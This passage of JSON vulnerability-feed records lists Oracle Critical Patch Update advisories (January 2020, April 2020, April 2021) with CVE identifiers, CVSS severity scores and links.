"CVE-2019-0221", "CVE-2019-0227", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10098", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12814", "CVE-2019-13117", "CVE-2019-13118", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1559", "CVE-2019-1563", "CVE-2019-15845", "CVE-2019-16168", "CVE-2019-16201", "CVE-2019-16254", "CVE-2019-16255", "CVE-2019-16335", "CVE-2019-16775", "CVE-2019-16776", "CVE-2019-16777", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-2094", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2904", "CVE-2019-3862", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-5718", "CVE-2019-8457", "CVE-2019-9208", "CVE-2019-9579", "CVE-2019-9636", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-2510", "CVE-2020-2511", "CVE-2020-2512", "CVE-2020-2515", "CVE-2020-2516", "CVE-2020-2517", "CVE-2020-2518", "CVE-2020-2519", "CVE-2020-2527", "CVE-2020-2530", "CVE-2020-2531", "CVE-2020-2533", "CVE-2020-2534", "CVE-2020-2535", "CVE-2020-2536", "CVE-2020-2537", "CVE-2020-2538", "CVE-2020-2539", "CVE-2020-2540", "CVE-2020-2541", "CVE-2020-2542", "CVE-2020-2543", "CVE-2020-2544", "CVE-2020-2545", "CVE-2020-2546", "CVE-2020-2547", "CVE-2020-2548", "CVE-2020-2549", "CVE-2020-2550", "CVE-2020-2551", "CVE-2020-2552", "CVE-2020-2555", "CVE-2020-2556", "CVE-2020-2557", "CVE-2020-2558", "CVE-2020-2559", "CVE-2020-2560", "CVE-2020-2561", "CVE-2020-2563", "CVE-2020-2564", "CVE-2020-2565", "CVE-2020-2566", "CVE-2020-2567", "CVE-2020-2568", "CVE-2020-2569", "CVE-2020-2570", "CVE-2020-2571", "CVE-2020-2572", "CVE-2020-2573", "CVE-2020-2574", "CVE-2020-2576", "CVE-2020-2577", "CVE-2020-2578", "CVE-2020-2579", "CVE-2020-2580", "CVE-2020-2581", "CVE-2020-2582", "CVE-2020-2583", "CVE-2020-2584", "CVE-2020-2585", "CVE-2020-2586", "CVE-2020-2587", "CVE-2020-2588", "CVE-2020-2589", "CVE-2020-2590", "CVE-2020-2591", "CVE-2020-2592", "CVE-2020-2593", "CVE-2020-2595", "CVE-2020-2596", "CVE-2020-2597", "CVE-2020-2598", "CVE-2020-2599", "CVE-2020-2600", "CVE-2020-2601", "CVE-2020-2602", "CVE-2020-2603", "CVE-2020-2604", "CVE-2020-2605", "CVE-2020-2606", "CVE-2020-2607", "CVE-2020-2608", "CVE-2020-2609", "CVE-2020-2610", "CVE-2020-2611", "CVE-2020-2612", "CVE-2020-2613", "CVE-2020-2614", "CVE-2020-2615", "CVE-2020-2616", "CVE-2020-2617", "CVE-2020-2618", "CVE-2020-2619", "CVE-2020-2620", "CVE-2020-2621", "CVE-2020-2622", "CVE-2020-2623", "CVE-2020-2624", "CVE-2020-2625", "CVE-2020-2626", "CVE-2020-2627", "CVE-2020-2628", "CVE-2020-2629", "CVE-2020-2630", "CVE-2020-2631", "CVE-2020-2632", "CVE-2020-2633", "CVE-2020-2634", "CVE-2020-2635", "CVE-2020-2636", "CVE-2020-2637", "CVE-2020-2638", "CVE-2020-2639", "CVE-2020-2640", "CVE-2020-2641", "CVE-2020-2642", "CVE-2020-2643", "CVE-2020-2644", "CVE-2020-2645", "CVE-2020-2646", "CVE-2020-2647", "CVE-2020-2648", "CVE-2020-2649", "CVE-2020-2650", "CVE-2020-2651", "CVE-2020-2652", "CVE-2020-2653", "CVE-2020-2654", "CVE-2020-2655", "CVE-2020-2656", "CVE-2020-2657", "CVE-2020-2658", "CVE-2020-2659", "CVE-2020-2660", "CVE-2020-2661", "CVE-2020-2662", "CVE-2020-2663", "CVE-2020-2664", "CVE-2020-2665", "CVE-2020-2666", "CVE-2020-2667", "CVE-2020-2668", "CVE-2020-2669", "CVE-2020-2670", "CVE-2020-2671", "CVE-2020-2672", "CVE-2020-2673", "CVE-2020-2674", "CVE-2020-2675", "CVE-2020-2676", "CVE-2020-2677", "CVE-2020-2678", "CVE-2020-2679", "CVE-2020-2680", "CVE-2020-2681", "CVE-2020-2682", "CVE-2020-2683", "CVE-2020-2684", "CVE-2020-2685", "CVE-2020-2686", "CVE-2020-2687", "CVE-2020-2688", "CVE-2020-2689", "CVE-2020-2690", "CVE-2020-2691", "CVE-2020-2692", "CVE-2020-2693", "CVE-2020-2694", "CVE-2020-2695", "CVE-2020-2696", "CVE-2020-2697", "CVE-2020-2698", "CVE-2020-2699", "CVE-2020-2700", "CVE-2020-2701", "CVE-2020-2702", "CVE-2020-2703", "CVE-2020-2704", "CVE-2020-2705", "CVE-2020-2707", "CVE-2020-2709", "CVE-2020-2710", "CVE-2020-2711", "CVE-2020-2712", "CVE-2020-2713", "CVE-2020-2714", "CVE-2020-2715", "CVE-2020-2716", "CVE-2020-2717", "CVE-2020-2718", "CVE-2020-2719", "CVE-2020-2720", "CVE-2020-2721", "CVE-2020-2722", "CVE-2020-2723", "CVE-2020-2724", "CVE-2020-2725", "CVE-2020-2726", "CVE-2020-2727", "CVE-2020-2728", "CVE-2020-2729", "CVE-2020-2730", "CVE-2020-2731", "CVE-2020-6950"], "modified": "2020-04-20T00:00:00", "id": "ORACLE:CPUJAN2020", "href": "https://www.oracle.com/security-alerts/cpujan2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:16", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 391 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2765149.1>).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2288", "CVE-2021-2271", "CVE-2021-2204", "CVE-2020-11612", "CVE-2020-26217", "CVE-2021-2163", "CVE-2021-2188", "CVE-2020-12723", "CVE-2019-5108", "CVE-2021-2276", "CVE-2021-2302", "CVE-2021-2297", "CVE-2021-2247", "CVE-2021-2231", "CVE-2019-12086", "CVE-2020-16166", "CVE-2021-2218", "CVE-2021-2207", "CVE-2021-2153", "CVE-2021-2239", "CVE-2021-2310", "CVE-2020-16845", "CVE-2021-2235", "CVE-2016-7103", "CVE-2019-15218", "CVE-2019-12423", "CVE-2021-2175", "CVE-2021-2278", "CVE-2018-1000180", "CVE-2019-10247", "CVE-2021-2189", "CVE-2020-11023", "CVE-2021-2152", "CVE-2021-2311", "CVE-2021-2147", "CVE-2021-2198", "CVE-2020-13434", "CVE-2020-28196", "CVE-2020-9484", "CVE-2019-16942", "CVE-2021-2201", "CVE-2021-2220", "CVE-2020-1927", "CVE-2019-10098", "CVE-2021-2134", "CVE-2019-11358", "CVE-2021-22884", "CVE-2019-3900", "CVE-2021-2244", "CVE-2020-36184", "CVE-2019-10080", "CVE-2020-27841", "CVE-2020-14039", "CVE-2020-5408", "CVE-2021-2183", "CVE-2021-2212", "CVE-2018-14550", "CVE-2019-17195", "CVE-2021-2169", "CVE-2021-2301", "CVE-2020-13935", "CVE-2020-9480", "CVE-2020-11022", "CVE-2021-2191", "CVE-2021-2182", "CVE-2021-2307", "CVE-2021-2208", "CVE-2021-20227", "CVE-2021-2234", "CVE-2020-7919", "CVE-2020-10683", "CVE-2019-3740", "CVE-2021-2149", "CVE-2021-2225", "CVE-2021-3449", "CVE-2019-10639", "CVE-2021-2210", "CVE-2020-35728", "CVE-2021-2270", "CVE-2021-2221", "CVE-2021-2253", "CVE-2019-3738", "CVE-2019-17638", "CVE-2021-2292", "CVE-2021-2251", "CVE-2020-17527", "CVE-2016-5725", "CVE-2019-7317", "CVE-2020-11994", "CVE-2020-26419", "CVE-2021-2151", "CVE-2021-2242", "CVE-2019-12419", "CVE-2020-5413", "CVE-2019-8331", "CVE-2021-2162", "CVE-2020-36182", "CVE-2020-5407", "CVE-2019-1241", "CVE-2020-27845", "CVE-2021-2300", "CVE-2020-24394", "CVE-2019-19052", "CVE-2019-17566", "CVE-2021-2154", "CVE-2019-3773", "CVE-2020-8284", "CVE-2020-12114", "CVE-2021-2180", "CVE-2020-13954", "CVE-2019-10086", "CVE-2017-12626", "CVE-2020-27844", "CVE-2021-2249", "CVE-2019-17571", "CVE-2021-2284", "CVE-2021-2226", "CVE-2021-2158", "CVE-2017-18640", "CVE-2021-2230", "CVE-2020-36181", "CVE-2021-2250", "CVE-2021-2205", "CVE-2021-2144", "CVE-2021-22191", "CVE-2021-2053", "CVE-2021-2214", "CVE-2020-11973", "CVE-2021-2318", "CVE-2020-10188", "CVE-2020-11656", "CVE-2020-26421", "CVE-2021-2266", "CVE-2021-2181", "CVE-2018-8032", "CVE-2020-5421", "CVE-2021-2140", "CVE-2021-2211", "CVE-2020-28052", "CVE-2020-5360", "CVE-2021-2308", "CVE-2021-2303", "CVE-2019-19922", "CVE-2021-2282", "CVE-2021-23336", "CVE-2021-2298", "CVE-2019-5063", "CVE-2020-17530", "CVE-2019-3739", "CVE-2020-36186", "CVE-2020-1968", "CVE-2020-10543", "CVE-2019-0232", "CVE-2020-7069", "CVE-2021-2195", "CVE-2020-9327", "CVE-2018-14042", "CVE-2021-2305", "CVE-2021-2295", "CVE-2020-1472", "CVE-2021-2136", "CVE-2020-5359", "CVE-2021-3450", "CVE-2018-1285", "CVE-2021-23840", "CVE-2021-2167", "CVE-2020-26420", "CVE-2020-14061", "CVE-2021-2316", "CVE-2019-19078", "CVE-2019-0233", "CVE-2021-2238", "CVE-2021-2268", "CVE-2021-2321", "CVE-2019-17495", "CVE-2020-7774", "CVE-2021-2245", "CVE-2020-27216", "CVE-2020-11998", "CVE-2020-10769", "CVE-2020-9281", "CVE-2020-7760", "CVE-2021-2166", "CVE-2021-2272", "CVE-2019-0230", "CVE-2020-11979", "CVE-2019-3874", "CVE-2021-23839", "CVE-2020-27842", "CVE-2021-2287", "CVE-2021-2237", "CVE-2020-26422", "CVE-2021-2264", "CVE-2021-2160", "CVE-2018-14041", "CVE-2021-2291", "CVE-2020-17521", "CVE-2021-2155", "CVE-2021-2173", "CVE-2021-2293", "CVE-2019-17075", "CVE-2021-2315", "CVE-2021-2277", "CVE-2021-2317", "CVE-2021-22174", "CVE-2019-20812", "CVE-2021-2229", "CVE-2021-2216", "CVE-2021-2259", "CVE-2021-2194", "CVE-2019-16746", "CVE-2019-19535", "CVE-2020-8285", "CVE-2021-2320", "CVE-2020-1945", "CVE-2021-2190", "CVE-2020-1941", "CVE-2021-2273", "CVE-2021-2312", "CVE-2020-36185", "CVE-2020-1971", "CVE-2020-25649", "CVE-2019-11599", "CVE-2021-2199", "CVE-2019-12406", "CVE-2019-5428", "CVE-2020-11987", "CVE-2021-2219", "CVE-2018-1000613", "CVE-2019-19063", "CVE-2021-2285", "CVE-2021-21345", "CVE-2020-11655", "CVE-2021-2314", "CVE-2021-2241", "CVE-2021-2269", "CVE-2020-35490", "CVE-2021-2200", "CVE-2021-2179", "CVE-2020-36188", "CVE-2020-36180", "CVE-2021-2192", "CVE-2021-2309", "CVE-2021-2159", "CVE-2021-2156", "CVE-2021-2186", "CVE-2020-13943", "CVE-2021-2202", "CVE-2020-13435", "CVE-2019-19066", "CVE-2021-2281", "CVE-2021-2283", "CVE-2019-0228", "CVE-2020-9488", "CVE-2021-2222", "CVE-2019-17632", "CVE-2021-2184", "CVE-2021-2296", "CVE-2020-10751", "CVE-2021-2187", "CVE-2021-2008", "CVE-2018-16884", "CVE-2020-8203", "CVE-2018-14040", "CVE-2020-7059", "CVE-2019-10638", "CVE-2021-2304", "CVE-2019-18885", "CVE-2020-9489", "CVE-2021-2224", "CVE-2020-24616", "CVE-2021-2279", "CVE-2020-26418", "CVE-2021-2185", "CVE-2020-36187", "CVE-2021-2170", "CVE-2021-2161", "CVE-2021-2246", "CVE-2021-2223", "CVE-2020-24750", "CVE-2021-2227", "CVE-2020-8277", "CVE-2019-11487", "CVE-2021-2319", "CVE-2021-2135", "CVE-2021-2146", "CVE-2021-2261", "CVE-2021-2280", "CVE-2020-35491", "CVE-2021-2145", "CVE-2021-2150", "CVE-2021-2236", "CVE-2019-2904", "CVE-2021-23841", "CVE-2021-2215", "CVE-2021-22173", "CVE-2020-13934", "CVE-2019-12402", "CVE-2017-14735", "CVE-2019-10072", "CVE-2019-14898", "CVE-2017-1000061", "CVE-2020-27218", "CVE-2021-2240", "CVE-2021-2141", "CVE-2020-7060", "CVE-2021-2203", "CVE-2021-2260", "CVE-2021-2196", "CVE-2018-1000632", "CVE-2020-1967", "CVE-2021-2274", "CVE-2020-8286", "CVE-2021-2255", "CVE-2019-19073", "CVE-2021-2213", "CVE-2021-2193", "CVE-2020-27193", "CVE-2021-2256", "CVE-2020-27223", "CVE-2017-5645", "CVE-2020-15358", "CVE-2021-2252", "CVE-2018-20843", "CVE-2021-2177", "CVE-2020-36183", "CVE-2021-2171", "CVE-2019-17573", "CVE-2021-2217", "CVE-2021-2290", "CVE-2021-2254", "CVE-2021-2299", "CVE-2021-2267", "CVE-2021-2275", "CVE-2019-19074", "CVE-2019-12415", "CVE-2020-5398", "CVE-2021-2164", "CVE-2021-2262", "CVE-2021-2142", "CVE-2019-5064", "CVE-2020-14060", "CVE-2020-36189", "CVE-2021-2206", "CVE-2021-2258", "CVE-2019-12399", "CVE-2020-12771", "CVE-2021-22112", "CVE-2020-36179", "CVE-2021-2306", "CVE-2020-27843", "CVE-2020-13956", "CVE-2020-14062", "CVE-2021-2172", "CVE-2020-10878", "CVE-2019-10246", "CVE-2019-10173", "CVE-2020-8908", "CVE-2020-15586", "CVE-2019-14379", "CVE-2020-13871", "CVE-2021-2263", "CVE-2021-2197", "CVE-2021-22883", "CVE-2019-0219", "CVE-2021-2209", "CVE-2020-14195", "CVE-2021-2286", "CVE-2021-2157", "CVE-2021-2289", "CVE-2019-0227", "CVE-2021-2248", "CVE-2021-21290", "CVE-2021-2228", "CVE-2019-0221", "CVE-2021-2232", "CVE-2021-2257", "CVE-2021-2178", "CVE-2021-2294", "CVE-2019-17133", "CVE-2021-2174", "CVE-2021-2233", "CVE-2016-2542", "CVE-2019-1551", "CVE-2020-24553", "CVE-2018-14613"], "modified": "2021-09-04T00:00:00", "id": "ORACLE:CPUAPR2021", "href": "https://www.oracle.com/security-alerts/cpuapr2021.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:58:58", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 399 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2652714.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-1832", "CVE-2015-3253", "CVE-2015-7940", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-10244", "CVE-2016-10251", "CVE-2016-10328", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3092", "CVE-2016-4000", "CVE-2016-4463", "CVE-2016-6306", "CVE-2016-6489", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-14735", "CVE-2017-15706", "CVE-2017-3160", "CVE-2017-5130", "CVE-2017-5529", "CVE-2017-5533", "CVE-2017-5645", "CVE-2017-5754", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2018-0732", "CVE-2018-0734", "CVE-2018-0737", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-1165", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-11797", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1320", "CVE-2018-1336", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17197", "CVE-2018-18227", "CVE-2018-18311", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-19622", "CVE-2018-19623", "CVE-2018-19624", "CVE-2018-19625", "CVE-2018-19626", "CVE-2018-19627", "CVE-2018-19628", "CVE-2018-20346", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-20852", "CVE-2018-5407", "CVE-2018-5711", "CVE-2018-5712", "CVE-2018-6942", "CVE-2018-8014", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8036", "CVE-2018-8037", "CVE-2018-8039", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0199", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0221", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1010238", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12387", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12418", "CVE-2019-12419", "CVE-2019-12855", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14821", "CVE-2019-14889", "CVE-2019-15161", "CVE-2019-15162", "CVE-2019-15163", "CVE-2019-15164", "CVE-2019-15165", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-15601", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16056", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17563", "CVE-2019-17571", "CVE-2019-18197", "CVE-2019-19242", "CVE-2019-19244", "CVE-2019-19269", "CVE-2019-19317", "CVE-2019-19553", "CVE-2019-19603", "CVE-2019-19645", "CVE-2019-19646", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-19959", "CVE-2019-20218", "CVE-2019-20330", "CVE-2019-2412", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2756", "CVE-2019-2759", "CVE-2019-2852", "CVE-2019-2853", "CVE-2019-2878", "CVE-2019-2880", "CVE-2019-2899", "CVE-2019-2904", "CVE-2019-3008", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9517", "CVE-2019-9579", "CVE-2020-2514", "CVE-2020-2522", "CVE-2020-2524", "CVE-2020-2553", "CVE-2020-2558", "CVE-2020-2575", "CVE-2020-2578", "CVE-2020-2594", "CVE-2020-2680", "CVE-2020-2706", "CVE-2020-2733", "CVE-2020-2734", "CVE-2020-2735", "CVE-2020-2737", "CVE-2020-2738", "CVE-2020-2739", "CVE-2020-2740", "CVE-2020-2741", "CVE-2020-2742", "CVE-2020-2743", "CVE-2020-2744", "CVE-2020-2745", "CVE-2020-2746", "CVE-2020-2747", "CVE-2020-2748", "CVE-2020-2749", "CVE-2020-2750", "CVE-2020-2751", "CVE-2020-2752", "CVE-2020-2753", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2756", "CVE-2020-2757", "CVE-2020-2758", "CVE-2020-2759", "CVE-2020-2760", "CVE-2020-2761", "CVE-2020-2762", "CVE-2020-2763", "CVE-2020-2764", "CVE-2020-2765", "CVE-2020-2766", "CVE-2020-2767", "CVE-2020-2768", "CVE-2020-2769", "CVE-2020-2770", "CVE-2020-2771", "CVE-2020-2772", "CVE-2020-2773", "CVE-2020-2774", "CVE-2020-2775", "CVE-2020-2776", "CVE-2020-2777", "CVE-2020-2778", "CVE-2020-2779", "CVE-2020-2780", "CVE-2020-2781", "CVE-2020-2782", "CVE-2020-2783", "CVE-2020-2784", "CVE-2020-2785", "CVE-2020-2786", "CVE-2020-2787", "CVE-2020-2789", "CVE-2020-2790", "CVE-2020-2791", "CVE-2020-2793", "CVE-2020-2794", "CVE-2020-2795", "CVE-2020-2796", "CVE-2020-2797", "CVE-2020-2798", "CVE-2020-2799", "CVE-2020-2800", "CVE-2020-2801", "CVE-2020-2802", "CVE-2020-2803", "CVE-2020-2804", "CVE-2020-2805", "CVE-2020-2806", "CVE-2020-2807", "CVE-2020-2808", "CVE-2020-2809", "CVE-2020-2810", "CVE-2020-2811", "CVE-2020-2812", "CVE-2020-2813", "CVE-2020-2814", "CVE-2020-2815", "CVE-2020-2816", "CVE-2020-2817", "CVE-2020-2818", "CVE-2020-2819", "CVE-2020-2820", "CVE-2020-2821", "CVE-2020-2822", "CVE-2020-2823", "CVE-2020-2824", "CVE-2020-2825", "CVE-2020-2826", "CVE-2020-2827", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2830", "CVE-2020-2831", "CVE-2020-2832", "CVE-2020-2833", "CVE-2020-2834", "CVE-2020-2835", "CVE-2020-2836", "CVE-2020-2837", "CVE-2020-2838", "CVE-2020-2839", "CVE-2020-2840", "CVE-2020-2841", "CVE-2020-2842", "CVE-2020-2843", "CVE-2020-2844", "CVE-2020-2845", "CVE-2020-2846", "CVE-2020-2847", "CVE-2020-2848", "CVE-2020-2849", "CVE-2020-2850", "CVE-2020-2851", "CVE-2020-2852", "CVE-2020-2853", "CVE-2020-2854", "CVE-2020-2855", "CVE-2020-2856", "CVE-2020-2857", "CVE-2020-2858", "CVE-2020-2859", "CVE-2020-2860", "CVE-2020-2861", "CVE-2020-2862", "CVE-2020-2863", "CVE-2020-2864", "CVE-2020-2865", "CVE-2020-2866", "CVE-2020-2867", "CVE-2020-2868", "CVE-2020-2869", "CVE-2020-2870", "CVE-2020-2871", "CVE-2020-2872", "CVE-2020-2873", "CVE-2020-2874", "CVE-2020-2875", "CVE-2020-2876", "CVE-2020-2877", "CVE-2020-2878", "CVE-2020-2879", "CVE-2020-2880", "CVE-2020-2881", "CVE-2020-2882", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2885", "CVE-2020-2886", "CVE-2020-2887", "CVE-2020-2888", "CVE-2020-2889", "CVE-2020-2890", "CVE-2020-2891", "CVE-2020-2892", "CVE-2020-2893", "CVE-2020-2894", "CVE-2020-2895", "CVE-2020-2896", "CVE-2020-2897", "CVE-2020-2898", "CVE-2020-2899", "CVE-2020-2900", "CVE-2020-2901", "CVE-2020-2902", "CVE-2020-2903", "CVE-2020-2904", "CVE-2020-2905", "CVE-2020-2906", "CVE-2020-2907", "CVE-2020-2908", "CVE-2020-2909", "CVE-2020-2910", "CVE-2020-2911", "CVE-2020-2912", "CVE-2020-2913", "CVE-2020-2914", "CVE-2020-2915", "CVE-2020-2920", "CVE-2020-2921", "CVE-2020-2922", "CVE-2020-2923", "CVE-2020-2924", "CVE-2020-2925", "CVE-2020-2926", "CVE-2020-2927", "CVE-2020-2928", "CVE-2020-2929", "CVE-2020-2930", "CVE-2020-2931", "CVE-2020-2932", "CVE-2020-2933", "CVE-2020-2934", "CVE-2020-2935", "CVE-2020-2936", "CVE-2020-2937", "CVE-2020-2938", "CVE-2020-2939", "CVE-2020-2940", "CVE-2020-2941", "CVE-2020-2942", "CVE-2020-2943", "CVE-2020-2944", "CVE-2020-2945", "CVE-2020-2946", "CVE-2020-2947", "CVE-2020-2949", "CVE-2020-2950", "CVE-2020-2951", "CVE-2020-2952", "CVE-2020-2953", "CVE-2020-2954", "CVE-2020-2955", "CVE-2020-2956", "CVE-2020-2958", "CVE-2020-2959", "CVE-2020-2961", "CVE-2020-2963", "CVE-2020-2964", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7044", "CVE-2020-8840"], "modified": "2020-07-20T00:00:00", "id": "ORACLE:CPUAPR2020", "href": "https://www.oracle.com/security-alerts/cpuapr2020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}